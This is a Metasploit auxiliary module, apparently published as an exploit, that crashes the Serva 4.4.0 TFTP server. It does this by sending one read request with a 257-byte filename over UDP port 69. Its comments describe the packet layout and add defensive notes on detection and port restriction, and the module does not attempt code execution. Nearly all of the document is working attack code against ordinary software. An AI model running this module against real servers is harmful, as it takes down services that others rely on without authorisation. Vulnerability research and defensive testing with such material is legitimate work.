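# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary denial-of-service check for the Serva 4.4.0 TFTP server.
#
# The module sends one TFTP read request (RRQ, opcode 1) whose filename
# field is 257 bytes long. According to the module description this is
# enough to bring the server down; nothing here attempts code execution,
# even though the title calls the flaw a buffer overflow.
#
# Defensive notes: a TFTP request with a filename this long is abnormal, so
# the length of the filename field in RRQ packets is a usable detection
# signal, and limiting UDP/69 to hosts that actually need TFTP reduces
# exposure.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  # NOTE(review): the description says this request brings the server down,
  # which sits oddly with ExcellentRanking; confirm the ranking is intended
  # for a DoS auxiliary module.
  Rank = ExcellentRanking

  # Registers the module metadata and the default target port (UDP/69).
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values declared here through update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
        'Description' => %q{
          The Serva TFTP server version 4.4.0 can be brought down by sending
          a special Read request.
        },
        'Author' => 'Yehia Elghaly',
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2021-11-23'
      )
    )

    register_options([Opt::RPORT(69)])
  end

  # Sends the single oversized read request and releases the UDP socket.
  #
  # The socket is closed in an ensure clause so that a failed send does not
  # leave it open for the rest of the framework session.
  def run
    connect_udp
    print_status("Sending Read request...")

    # TFTP RRQ layout: opcode | filename | NUL | mode | NUL
    request = "\x00\x01"      # opcode 1 = read request
    request += "A" * 257      # filename field, 257 bytes
    request += "\x00"         # filename terminator
    request += "netascii"     # transfer mode
    request += "\x00"         # mode terminator

    udp_sock.put(request)
  ensure
    disconnect_udp
  end
end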